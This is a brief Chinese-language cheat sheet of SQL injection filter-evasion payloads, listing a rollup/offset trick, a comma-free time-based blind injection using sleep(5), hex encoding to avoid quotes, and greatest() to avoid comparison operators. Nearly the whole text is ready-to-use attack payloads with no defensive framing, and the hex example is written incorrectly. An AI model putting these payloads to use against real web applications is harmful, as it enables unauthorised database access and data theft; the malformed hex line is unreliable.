1.group by pwd with rollup limit 1 offset 2 #
2.如果需要绕过逗号:’ union select case when substring((select xx from xx where xx) from 1 for 1)=’x’ then sleep(5) else 0 end #
3.绕过引号:利用十六进制,如”user”=0x750x730x650x72
4.大于小于绕过:greatest(n1,n2,n3,等)函数返回输入参数(n1,n2,n3,等)的最大值,如:greatest(ascii(substr(database(),0,1)),64)=64